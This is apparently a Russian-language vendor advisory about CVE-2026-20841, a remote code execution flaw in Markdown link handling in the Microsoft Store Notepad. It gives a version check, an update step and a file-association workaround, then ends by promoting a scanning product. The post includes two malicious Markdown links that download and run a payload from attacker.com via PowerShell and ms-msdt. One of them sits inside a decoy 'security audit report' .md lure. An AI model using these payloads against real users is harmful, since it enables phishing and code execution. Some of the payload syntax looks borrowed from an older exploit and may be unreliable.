CVE Analysis21 февраля 20265 мин

CVE-2026-20841: RCE в Windows Notepad через Markdown

Новый рендеринг Markdown в Блокноте Windows имеет критическую уязвимость. Специальный .md файл позволяет выполнить код по клику на ссылку.

Кратко

RCE в современном Блокноте Windows (версия из Microsoft Store)
Вредоносные Markdown-ссылки вызывают инъекцию команд по клику
CVSS 8.8 — требуется взаимодействие пользователя, но эксплуатация тривиальна
Исправление: обновить Блокнот через Microsoft Store до версии 11.2510+

Что такое CVE-2026-20841?

Уязвимость удалённого выполнения кода в современном Блокноте Windows. Движок Markdown не санитизирует URI-схемы в гиперссылках. Клик по специальной ссылке в .md файле — и Блокнот передаёт её напрямую системному шеллу.

 Attack Chain — CVE-2026-20841

📧

Email with .md file

📝

Victim opens in Notepad

🔗

Clicks crafted link

⚡

URI → System Shell

💀

Code Execution

Как это работает

Современный Блокнот парсит Markdown — жирный текст, заголовки, ссылки. Атакующие встраивают ссылку с кастомной протокольной схемой, указывающей на скрипт. Блокнот не валидирует URI, передаёт его обработчику протоколов ОС — payload выполняется.

 Notepad — report.md (Preview)

Q4 Security Audit Report

Status: COMPLETE | Classification: Internal

All systems passed baseline security checks. Click below to view the full interactive report.

🔗 View Full Report →

Generated by SecurityBot v4.2 | Do not forward

# Нормальная Markdown-ссылка:
[Нажмите](https://example.com)

# Вредоносная — инъекция команд по клику:
[Открыть отчёт](powershell://command=Invoke-WebRequest%20-Uri%20http://attacker.com/shell.exe%20-OutFile%20C:/temp/shell.exe;Start-Process%20C:/temp/shell.exe)

# Жертва видит обычную ссылку "Открыть отчёт"
# Клик → PowerShell скачивает и запускает payload

Вы уязвимы?

Проверьте версию Блокнота. Если из Microsoft Store и ниже 11.2510 — вы под угрозой.

# Проверка версии через PowerShell
Get-AppxPackage *Notepad* | Select-Object Name, Version

# Если Version < 11.2510.0.0 → УЯЗВИМ
# Классический notepad.exe НЕ затронут

Классический notepad.exe НЕ уязвим. Только версия из Microsoft Store с поддержкой Markdown.

Эксплойт — Полная цепочка

Атакующий отправляет .md файл по почте. Жертва открывает, видит профессиональный документ, кликает ссылку — готово.

cat > report.md << 'EOF'
# Отчёт аудита безопасности Q4

Статус: **ЗАВЕРШЁН** | Классификация: Внутренний

## Итоги
Все системы прошли базовые проверки.

[Открыть полный отчёт](ms-msdt:/id PCWDiagnostic /skip force /param "IT_RBrowseForFile=$(IEX(IWR -Uri http://attacker.com/payload.ps1))")

---
*Сгенерировано SecurityBot v4.2*
EOF

# Жертва открывает → кликает → PowerShell выполняет payload

Исправление

Обновите немедленно. Заблокируйте, если не можете обновить.

# Обновить Блокнот
winget upgrade "Windows Notepad"

# Или временно: привязать .md к legacy notepad
assoc .md=txtfile
ftype txtfile=C:\Windows\System32\notepad.exe %1

Обновите до 11.2510+. Если нельзя — откатите .md на классический notepad.exe.

Сканируйте с TEPTEZ. Найдите это раньше атакующих.

TEPTEZ сканирует endpoint-ы на уязвимые версии приложений, необновлённое ПО и эксплуатируемые конфигурации. Попробуйте наш DAST AI — сканирует, находит и даёт готовое исправление.

Попробовать TEPTEZ